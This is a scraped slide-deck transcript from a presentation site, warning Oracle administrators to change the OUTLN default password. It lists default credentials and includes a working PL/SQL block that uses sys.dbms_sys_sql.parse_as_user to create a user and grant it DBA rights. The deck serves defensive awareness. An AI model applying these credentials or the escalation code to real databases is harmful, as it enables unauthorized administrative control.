select * from all_users where username = 'HACKY'; no rows selected"> select * from all_users where username = 'HACKY'; no rows selected">

Presentation is loading. Please wait.

Presentation is loading. Please wait.

Remember to change the OUTLN password Urs Messerli Messerli Datenbanktechnik Gmbh www.datenbanktechnik.ch.

Published byKenya Flemons Modified over 10 years ago

Similar presentations

Presentation on theme: "Remember to change the OUTLN password Urs Messerli Messerli Datenbanktechnik Gmbh www.datenbanktechnik.ch."— Presentation transcript:

1 Remember to change the OUTLN password Urs Messerli Messerli Datenbanktechnik Gmbh www.datenbanktechnik.ch

2 Default passwords sys/change_on_install system/manager outln/outln

3 Log on as OUTLN SQL> show user USER is "OUTLN" SQL> select * from all_users where username = 'HACKY'; no rows selected

4 OUTLN has lots of privileges SQL> select * FROM SESSION_PRIVS; PRIVILEGE ---------------------------------------- CREATE SESSION ALTER SESSION UNLIMITED TABLESPACE CREATE TABLE CREATE CLUSTER CREATE SYNONYM CREATE VIEW CREATE SEQUENCE CREATE DATABASE LINK CREATE PROCEDURE EXECUTE ANY PROCEDURE CREATE TRIGGER CREATE TYPE CREATE OPERATOR CREATE INDEXTYPE 15 rows selected.

5 So create a user with DBA privilege DECLARE mycur INTEGER; BEGIN mycur := sys.dbms_sys_sql.open_cursor; sys.dbms_sys_sql.parse_as_user(mycur, 'create user hacky identified by macho',dbms_sql.native, 0); sys.dbms_sys_sql.parse_as_user(mycur, 'grant dba to hacky',dbms_sql.native,0); sys.dbms_sys_sql.close_cursor(mycur); END; / PL/SQL procedure successfully completed.

6 So I did create the user, but I don’t have the privileges myself SQL> DROP USER HACKY; DROP USER HACKY * ERROR at line 1: ORA-01031: insufficient privileges

7 The keys to the kingdom I have created a new user with DBA privilege I have executed code as the DBA I could do anything! Worried?

8 The Moral of this story is… Change all the default passwords Including OUTLN/OUTLN

9 Remember to change the OUTLN password Urs Messerli Messerli Datenbanktechnik Gmbh www.datenbanktechnik.ch

Download ppt "Remember to change the OUTLN password Urs Messerli Messerli Datenbanktechnik Gmbh www.datenbanktechnik.ch."

Similar presentations

10 g An Investigation Into The Security Of Oracle 10g Enterprise Edition Release 2 Researcher: Okelitse Nyathi Supervisor: Mr J Ebden.

10 g An Investigation Into The Security Of Oracle 10g Enterprise Edition Release 2 Researcher: Okelitse Nyathi Supervisor: Mr J Ebden.
Password Management for Oracle8 Ari Kaplan Independent Consultant.

Password Management for Oracle8 Ari Kaplan Independent Consultant.
14-1 Copyright  Oracle Corporation, 1998. All rights reserved. Privileges Database security: – System security – Data security System privileges: Gain.

14-1 Copyright  Oracle Corporation, All rights reserved. Privileges Database security: – System security – Data security System privileges: Gain.
13 Copyright © Oracle Corporation, 2001. All rights reserved. Controlling User Access.

13 Copyright © Oracle Corporation, All rights reserved. Controlling User Access.
Database Security and Auditing: Protecting Data Integrity and Accessibility Chapter 8 Application Data Auditing.

Database Security and Auditing: Protecting Data Integrity and Accessibility Chapter 8 Application Data Auditing.
Database Security and Auditing: Protecting Data Integrity and Accessibility Chapter 8 Application Data Auditing.

Database Security and Auditing: Protecting Data Integrity and Accessibility Chapter 8 Application Data Auditing.
System Administration Accounts privileges, users and roles

System Administration Accounts privileges, users and roles
Backup The flip side of recovery. Types of Failures Transaction failure –Transaction must be aborted System failure –Hardware or software problem resulting.

Backup The flip side of recovery. Types of Failures Transaction failure –Transaction must be aborted System failure –Hardware or software problem resulting.
Oracle8 - The Complete Reference. Koch a& Loney1 By What Authority? Presented by Victor Matos.

Oracle8 - The Complete Reference. Koch a& Loney1 By What Authority? Presented by Victor Matos.
Harvard University Oracle Database Administration Session 2 System Level.

Harvard University Oracle Database Administration Session 2 System Level.
Database Management System LICT 3011 Eyad H. Elshami.

Database Management System LICT 3011 Eyad H. Elshami.
Adapted from Afyouni, Database Security and Auditing DB Auditing Examples (Ch. 9) Dr. Mario Guimaraes.

Adapted from Afyouni, Database Security and Auditing DB Auditing Examples (Ch. 9) Dr. Mario Guimaraes.
Adapted from Afyouni, Database Security and Auditing Database Application Auditing – Ch. 8.

Adapted from Afyouni, Database Security and Auditing Database Application Auditing – Ch. 8.
Database Security and Auditing: Protecting Data Integrity and Accessibility Chapter 3 Administration of Users.

Database Security and Auditing: Protecting Data Integrity and Accessibility Chapter 3 Administration of Users.
Getting Started with Oracle11g Abeer bin humaid. Create database user You should create at least one database user that you will use to create database.

Getting Started with Oracle11g Abeer bin humaid. Create database user You should create at least one database user that you will use to create database.
Agenda Journalling More Embedded SQL. Journalling.

Agenda Journalling More Embedded SQL. Journalling.
By Lecturer / Aisha Dawood 1.  Administering Users  Create and manage database user accounts.  Create and manage roles.  Grant and revoke privileges.

By Lecturer / Aisha Dawood 1.  Administering Users  Create and manage database user accounts.  Create and manage roles.  Grant and revoke privileges.
CHAPTER 6 Users and Basic Security. Progression of Steps for Creating a Database Environment 1. Install Oracle database binaries (Chapter 1) 2. Create.

CHAPTER 6 Users and Basic Security. Progression of Steps for Creating a Database Environment 1. Install Oracle database binaries (Chapter 1) 2. Create.
9 Copyright © 2005, Oracle. All rights reserved. Administering User Security.

9 Copyright © 2005, Oracle. All rights reserved. Administering User Security.
Copyright س Oracle Corporation, 1998. All rights reserved. 14 Controlling User Access.

Copyright س Oracle Corporation, All rights reserved. 14 Controlling User Access.

Similar presentations

Ads by Google